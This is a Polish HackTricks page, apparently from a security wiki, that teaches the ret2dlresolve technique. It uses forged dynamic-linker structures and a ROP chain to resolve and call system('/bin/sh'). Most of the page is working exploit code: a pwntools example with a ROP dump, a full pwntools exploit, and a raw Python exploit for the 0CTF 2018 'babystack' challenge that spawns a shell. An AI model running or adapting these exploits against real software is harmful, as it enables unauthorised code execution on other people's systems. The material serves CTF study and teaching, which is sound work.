Ret2dlresolve

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Podstawowe informacje

Jak wyjaśniono na stronie dotyczącej GOT/PLT i Relro, pliki binarne bez pełnego Relro będą rozwiązywać symbole (takie jak adresy do zewnętrznych bibliotek) za pierwszym razem, gdy zostaną użyte. To rozwiązanie następuje poprzez wywołanie funkcji _dl_runtime_resolve.

Funkcja _dl_runtime_resolve pobiera ze stosu odwołania do pewnych struktur, których potrzebuje do rozwiązania określonego symbolu.

Dlatego możliwe jest podrobienie wszystkich tych struktur, aby dynamiczne łączenie rozwiązało żądany symbol (np. funkcję system) i wywołało go z skonfigurowanym parametrem (np. system('/bin/sh')).

Zazwyczaj wszystkie te struktury są fałszowane poprzez utworzenie początkowego łańcucha ROP, który wywołuje read na zapisywalnej pamięci, a następnie przekazywane są struktury i ciąg znaków '/bin/sh', aby zostały przechowywane przez read w znanym miejscu, a następnie łańcuch ROP kontynuuje wywołanie _dl_runtime_resolve, mając go rozwiązać adres system w fałszywych strukturach i wywołać ten adres z adresem do $'/bin/sh'.

Ta technika jest szczególnie przydatna, zwłaszcza jeśli nie ma gadżetów systemowych (do użycia technik takich jak ret2syscall lub SROP) i nie ma sposobów na wyciek adresów libc.

Sprawdź ten filmik, aby uzyskać ładne wyjaśnienie tej techniki w drugiej połowie filmu:

Lub sprawdź te strony, aby uzyskać krok po kroku wyjaśnienie:

Podsumowanie ataku

 1. Napisz fałszywe struktury w pewnym miejscu

 2. Ustaw pierwszy argument systemu ($rdi = &'/bin/sh')

 3. Ustaw na stosie adresy do struktur, aby wywołać _dl_runtime_resolve

 4. Wywołaj _dl_runtime_resolve

 5. system zostanie rozwiązany i wywołany z '/bin/sh' jako argumentem

Z dokumentacji pwntools wynika, że atak ret2dlresolve wygląda następująco:

context.binary = elf = ELF(pwnlib.data.elf.ret2dlresolve.get('amd64'))
>>> rop = ROP(elf)
>>> dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["echo pwned"])
>>> rop.read(0, dlresolve.data_addr) # do not forget this step, but use whatever function you like
>>> rop.ret2dlresolve(dlresolve)
>>> raw_rop = rop.chain()
>>> print(rop.dump())
0x0000:     0x400593 pop rdi; ret
0x0008:       0x0 [arg0] rdi = 0
0x0010:     0x400591 pop rsi; pop r15; ret
0x0018:     0x601e00 [arg1] rsi = 6299136
0x0020:   b'iaaajaaa' <pad r15>
0x0028:     0x4003f0 read
0x0030:     0x400593 pop rdi; ret
0x0038:     0x601e48 [arg0] rdi = 6299208
0x0040:     0x4003e0 [plt_init] system
0x0048:     0x15670 [dlresolve index]

Przykład

Czyste narzędzie Pwntools

Możesz znaleźć przykład tej techniki tutaj z bardzo dobrą wyjaśnieniem końcowego łańcucha ROP, ale tutaj jest używany ostateczny exploit:

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)
p = elf.process()
rop = ROP(elf)

# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve)   # call .plt and dl-resolve() with the correct, calculated reloc_offset

log.info(rop.dump())

p.sendline(rop.chain())
p.sendline(dlresolve.payload)  # now the read is called and we pass all the relevant structures in

p.interactive()

Surowe

# Code from https://guyinatuxedo.github.io/18-ret2_csu_dl/0ctf18_babystack/index.html
# This exploit is based off of: https://github.com/sajjadium/ctf-writeups/tree/master/0CTFQuals/2018/babystack

from pwn import *

target = process('./babystack')
#gdb.attach(target)

elf = ELF('babystack')

# Establish starts of various sections
bss = 0x804a020

dynstr = 0x804822c

dynsym = 0x80481cc

relplt = 0x80482b0

# Establish two functions

scanInput = p32(0x804843b)
resolve = p32(0x80482f0) #dlresolve address

# Establish size of second payload

payload1_size = 43

# Our first scan
# This will call read to scan in our fake entries into the plt
# Then return back to scanInput to re-exploit the bug

payload0 = ""

payload0 += "0"*44            # Filler from start of input to return address
payload0 += p32(elf.symbols['read'])  # Return read
payload0 += scanInput          # After the read call, return to scan input
payload0 += p32(0)            # Read via stdin
payload0 += p32(bss)          # Scan into the start of the bss
payload0 += p32(payload1_size)      # How much data to scan in

target.send(payload0)

# Our second scan
# This will be scanned into the start of the bss
# It will contain the fake entries for our ret_2_dl_resolve attack

# Calculate the r_info value
# It will provide an index to our dynsym entry
dynsym_offset = ((bss + 0xc) - dynsym) / 0x10
r_info = (dynsym_offset << 8) | 0x7

# Calculate the offset from the start of dynstr section to our dynstr entry
dynstr_index = (bss + 28) - dynstr

paylaod1 = ""

# Our .rel.plt entry
paylaod1 += p32(elf.got['alarm'])
paylaod1 += p32(r_info)

# Empty
paylaod1 += p32(0x0)

# Our dynsm entry
paylaod1 += p32(dynstr_index)
paylaod1 += p32(0xde)*3

# Our dynstr entry
paylaod1 += "system\x00"

# Store "/bin/sh" here so we can have a pointer ot it
paylaod1 += "/bin/sh\x00"

target.send(paylaod1)

# Our third scan, which will execute the ret_2_dl_resolve
# This will just call 0x80482f0, which is responsible for calling the functions for resolving
# We will pass it the `.rel.plt` index for our fake entry
# As well as the arguments for system

# Calculate address of "/bin/sh"
binsh_bss_address = bss + 35

# Calculate the .rel.plt offset
ret_plt_offset = bss - relplt


paylaod2 = ""

paylaod2 += "0"*44
paylaod2 += resolve         # 0x80482f0
paylaod2 += p32(ret_plt_offset)    # .rel.plt offset
paylaod2 += p32(0xdeadbeef)      # The next return address after 0x80482f0, really doesn't matter for us
paylaod2 += p32(binsh_bss_address)  # Our argument, address of "/bin/sh"

target.send(paylaod2)

# Enjoy the shell!
target.interactive()

Inne Przykłady i Referencje

Last updated